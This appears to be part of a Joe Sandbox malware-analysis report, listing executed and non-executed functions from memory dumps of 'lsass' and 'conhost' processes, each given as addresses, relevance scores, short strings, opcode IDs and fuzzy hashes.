                                                            • Instruction Fuzzy Hash: 48416D17B0C1626AE12137FD75715EE6BAC8F86334B0C5677E14CEA0939CB874C582E5

                                                            Executed Functions

                                                            Function 00007FFD348B0D4C Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 6e2d8d66a362c7f5179eb0003b8adab3284350e7c99196b08646560828980e0e
                                                            • Instruction ID: 931844fb01f486ab59903956cd7e89c6c2c41927f5213201ad6e0da5748ef390
                                                            • Opcode Fuzzy Hash: 6e2d8d66a362c7f5179eb0003b8adab3284350e7c99196b08646560828980e0e
                                                            • Instruction Fuzzy Hash: 7491D6B5A0DA8D8FE755EB9C88B97A97FE1EF56300F0401BAC04AD76D2DE792411C740
                                                            Function 00007FFD348B07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAz4
                                                            • API String ID: 0-4208471536
                                                            • Opcode ID: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction ID: 7470b4312726b0e37fc381a5c3c137eee02d1f7244ea50c529dd3a121b239b27
                                                            • Opcode Fuzzy Hash: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction Fuzzy Hash: D7313421A0E7890FE7569B3888B51A93BB0EF87200F0941F7D549C71E3DD2C69068791
                                                            Function 00007FFD348B08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d83cef17d0ede5d2ce077fd8ef555ff4f528d11e3b87086b7ded14c4205d04b
                                                            • Instruction ID: 8afcb72d535c34bc27db804b727408b6b3f156c9aefd964142de33f2da090e0c
                                                            • Opcode Fuzzy Hash: 5d83cef17d0ede5d2ce077fd8ef555ff4f528d11e3b87086b7ded14c4205d04b
                                                            • Instruction Fuzzy Hash: F1412022B0C5290FE714B7FCA0BA2FAB790DF86325B0801BBD14DC7193ED6CA84182C4
                                                            Function 00007FFD348B090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59abb8ecbd0ecfee8f9b2875574b18ccbc5d3b50c0f907ba563baa28f18bc73d
                                                            • Instruction ID: 668d30e3f646acec8feb796cdb4846c785840f085605fd94b333f1f5601a0290
                                                            • Opcode Fuzzy Hash: 59abb8ecbd0ecfee8f9b2875574b18ccbc5d3b50c0f907ba563baa28f18bc73d
                                                            • Instruction Fuzzy Hash: 6E411322B0C5291FE754B7FC64AA2F977D1DF86321B08447AE14DC7193DDACA84182C4
                                                            Function 00007FFD348B0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: e9a9dbf1134489ff64ed3cba917a8358e1fcd4671c08e58730990ba5daa9f485
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 7321913130C9184FE768EA1CE88ADB977D1EF9A32171501BAE58AC7126E955EC8287C1
                                                            Function 00007FFD348B4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction ID: 7576e503df4d863be61114b351e301bd5f2f669ca10a6d89107f0f71a574b2be
                                                            • Opcode Fuzzy Hash: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction Fuzzy Hash: 4E310120F0C91A4FEB94EB2884B67B86291FF5B740F5041B5D64ED7296DEACAC40A781
                                                            Function 00007FFD348B116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7780ac80b48f5c741b37c795d7f2ba79bd420d97cb77fb809452882ec2b95c4
                                                            • Instruction ID: 0eff1b7284e4e9e37b9d9ec67e5e96fe29d51a0a54741eb9e1728c749767138c
                                                            • Opcode Fuzzy Hash: e7780ac80b48f5c741b37c795d7f2ba79bd420d97cb77fb809452882ec2b95c4
                                                            • Instruction Fuzzy Hash: E2318631A0C54A8FDB45EB68C8A59B977F0FF5A310F0545BAC00ADB293DE79A945CB80
                                                            Function 00007FFD348B0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83c3143f7cb6ca8372a7efc9b93d5cad310d4ac1e1942e1354e8dc03c3309a41
                                                            • Instruction ID: 8cb7cb3f2fa0c94b408fec3cd5545e3b2cc5093890c4f78613ca2a1734325a42
                                                            • Opcode Fuzzy Hash: 83c3143f7cb6ca8372a7efc9b93d5cad310d4ac1e1942e1354e8dc03c3309a41
                                                            • Instruction Fuzzy Hash: 9521F920B1C9290FF798B76C94EE6B976C2EB9A315B500079E50EC33D2DDACAC4182C5
                                                            Function 00007FFD348B0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction ID: d096ccad5cc86478fd04227944588ddc4db47be91ce7d6d8977c420fe186064d
                                                            • Opcode Fuzzy Hash: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction Fuzzy Hash: 2A21B136B0D6899FE712ABA898B10ED7B60EF43320F1442B2D148DB183EE7C654696C1
                                                            Function 00007FFD348B0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction ID: 3156e41ba4909368740d6bee8e92eb440faad0ac713325e6336dc9b8cd247d97
                                                            • Opcode Fuzzy Hash: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction Fuzzy Hash: 80119E35B0E68D8EE7139B6888B11AD7BA0EF53310F1545B6C144DB192DE7C660697C1
                                                            Function 00007FFD348B5721 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a1f2a670c29b133280668e316292e36719975cb5bec8deaaf26a560a7efe114
                                                            • Instruction ID: dcd4704a895531c7c5c66b96c5c3952567d7d50d8977026c2c802af14f505d1d
                                                            • Opcode Fuzzy Hash: 5a1f2a670c29b133280668e316292e36719975cb5bec8deaaf26a560a7efe114
                                                            • Instruction Fuzzy Hash: 5611DD71B08A09CFDB94DB48C494BAD77F2EB58315F15416AC40ED7290CF79A981DB48
                                                            Function 00007FFD348B0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction ID: 712c9a87abc59480b90db644c00259f4adf89bffa35cc7a9c29fdbe9e0f719ee
                                                            • Opcode Fuzzy Hash: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction Fuzzy Hash: 33118B35A0E68D8FE713DB6888B10AD7BB0EF53310F1541B6C144DB192DE7CA64AAB81
                                                            Function 00007FFD348B0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction ID: c0f9a6284258d6d90449cdae7da6f3e2ed25fd9b212614c2871a2d786d00d2e9
                                                            • Opcode Fuzzy Hash: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction Fuzzy Hash: 52017C34E0E2899FEB12DB6888A409D7FB0EF03300F1441F6D544DB192DE7CAA459781
                                                            Function 00007FFD348B4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: ccede96e88bc7e0a21b6ca1f725839310230ca55dd1c7de19ccbd3975723da9f
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 64F0EC30A1CA1E8EFB55EB40C8E57F87361FB97701F5041B5C60AD72A5DFAC69809A81
                                                            Function 00007FFD348B45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 303be9dbd397d72052ab4426d3bdc686c0a49139f0a662adfa975f5fce6681dd
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: BBF05E30B0CA0A4EFB90EB00C8E57F82391FF57700F108175CA4ED72A2DEAC69409AC0
                                                            Function 00007FFD348B06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction ID: 0e1ac431929f476acabd6338b9bf160cda12f825b496f6581b6df297c8901bf1
                                                            • Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction Fuzzy Hash: F7E0DF01E4E78A0EE60322BD14F60AD7A141F93214F9801B2C64DD60A3BCCE309826A2
                                                            Function 00007FFD348B2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: ad0b291874e62b9b7d13df6e15b7efe3e4b269c6aba3380eaa1ab2a98312651c
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: A9E01260F0D4064AFB94A744D4A17A96255DB4A310F140078DB4ED33C1CD6CAD409B86
                                                            Function 00007FFD348BF1C8 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction ID: dffbaded173453830d459f879d6a779dada45bb9c3ce3f3df7bcf865b9ef2c56
                                                            • Opcode Fuzzy Hash: 328f2719d672d29b5b68c311e6b4c6e7d26fcaa1a2469217ebe8a8a5fa804afd
                                                            • Instruction Fuzzy Hash: 5CD05E346259084BCB08EF39C88E535B3D1FB9A206F99C2BA944ED6670CF6998815741
                                                            Function 00007FFD348B0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: a72dcec10c68db10ea45f213d187928fe39dfa7d4f5fd9b240b871a8dc6b700b
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: B8D0A730218A4E4FD600B738C88A4247BA0FF0F211FD510E1E008C71A2D50848558740
                                                            Function 00007FFD348B0550 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd238f91b8fea04b2c92cf434059331626b8b82a1747773866b17b3126e7c16d
                                                            • Instruction ID: 4ebab814d29b4c722bb6b89488009cdaa95fcce33e056b02b1e327b596b366cb
                                                            • Opcode Fuzzy Hash: cd238f91b8fea04b2c92cf434059331626b8b82a1747773866b17b3126e7c16d
                                                            • Instruction Fuzzy Hash: EAC08C16EAFC8909E968133E0CF20103880AF4A20CBDA00E4E688C06CAEC8D55499386
                                                            Function 00007FFD348B06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 9e861f3e439aaf853c8f11a22adbb079205d10f98cd7a304199f1e10a4677264
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 60C04C05F5E61F09B815776E58E60ACA1409BD7610FD50172D74DD00D19CCD24D921D6
                                                            Function 00007FFD348B12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 386651720350b0619f7d7d9a3cfaa5a0b8af7bb539c6fe2dbe72a98b27a909b0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 7BC04C345518099FC948EB29C89595477A0FB1A315BD50094E409C7171D65AECD5D781
                                                            Function 00007FFD348B4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df8d737d92323cbc912449fc7b515424b586c01dd3a1e70431a08655a3c13fff
                                                            • Instruction ID: 0a150ebedfe9b37cb29d960771d3d1090b6a2d674db822227d022fa5eb604025
                                                            • Opcode Fuzzy Hash: df8d737d92323cbc912449fc7b515424b586c01dd3a1e70431a08655a3c13fff
                                                            • Instruction Fuzzy Hash: 15C08C00F08C1A47F2A022C800312BE00464F88300F544430E10FEB3C6CE6C2C0102CA
                                                            Function 00007FFD348B06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: a84eed44f54335c228166c2b680a71cf7003e3d9a047fb829d510b8d8adaef60
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 23B01200E5A40F08A404337E08D20A470405B47100FC000B0D60EC00819CCD249422C2
                                                            Function 00007FFD348B1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 46483bb4b5e4ee59b5de81c9b5a2aa8061e20f852aa1730399efe1ce38cac06f
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 90C02B30F0C40C44E734433048520FB32014F47304F0542F1810BFB082CC3C1C003180

                                                            Non-executed Functions

                                                            Function 00007FFD348B09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction ID: 40787fd4f5c1e84265361780250e3d326b567a453aa7cccb4a766ba0eb3ec8f2
                                                            • Opcode Fuzzy Hash: 19f9022f087a140241641a209f260c8d6e5ad60b3058d73327d322ddeecc527c
                                                            • Instruction Fuzzy Hash: 5B418207B0D56A6AE22137FD75711FE6BA88F82375B0C6777E14C9A1C36CB8708182E5

                                                            Executed Functions

                                                            Function 00007FFD348A0D4C Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: cc030b84b50d3c6ea8bbf480b354d2b57c4c4699471b4f81ab3787a46e2a54f2
                                                            • Instruction ID: 35a5f904a36c9c5923850596cc3f3f8bed0c8cea68589e8aba1f95ab242ad823
                                                            • Opcode Fuzzy Hash: cc030b84b50d3c6ea8bbf480b354d2b57c4c4699471b4f81ab3787a46e2a54f2
                                                            • Instruction Fuzzy Hash: 6891E576A09A894FE799DF6888753A9BFE1FF57300F0401BEC249E72D6CAB92411C750
                                                            Function 00007FFD348D1000 Relevance: .4, Instructions: 394COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b947dfd8d941c3745f0f8f283d018b43d56231111a640500d5722d80ddab166
                                                            • Instruction ID: d8d8f57b94d51205f5055ab7674764cdbdc6a39b4265f54b08f8f82570d3b431
                                                            • Opcode Fuzzy Hash: 5b947dfd8d941c3745f0f8f283d018b43d56231111a640500d5722d80ddab166
                                                            • Instruction Fuzzy Hash: D1A15A21A6F65A06E31D9A1C48E30B573C2EF93606B29537DCEDBC748BDD1C681386C1
                                                            Function 00007FFD348D332D Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4$M
                                                            • API String ID: 0-1856302214
                                                            • Opcode ID: 719843f7824242f42356f5a804432637f5d74ba88d4d74e533a6350563ead6c6
                                                            • Instruction ID: d851d56d0d49d61ea5f4faed828ef769bbebd70f609bd4a0eabab7a27c132242
                                                            • Opcode Fuzzy Hash: 719843f7824242f42356f5a804432637f5d74ba88d4d74e533a6350563ead6c6
                                                            • Instruction Fuzzy Hash: 96A1B321B1E94A0FEB98EB6884B66B5B7D1FF96310F0446BAD50DC7283DD2CBC459341
                                                            Function 00007FFD348D3365 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4
                                                            • API String ID: 0-890708349
                                                            • Opcode ID: e146b148f52c97daef2ded6f09549e9ca9854f31da8fb55fcad55f15d6b490e6
                                                            • Instruction ID: 7a2716372fb3c0792d11c0409e8d770954c21781e53bbdedede5c622147e4f23
                                                            • Opcode Fuzzy Hash: e146b148f52c97daef2ded6f09549e9ca9854f31da8fb55fcad55f15d6b490e6
                                                            • Instruction Fuzzy Hash: D571A421B1E94A0FEB98EBA984B63B573D2EF96310F44427AD50DC7283DD6CAC459380
                                                            Function 00007FFD348A07D0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAy4
                                                            • API String ID: 0-3522526771
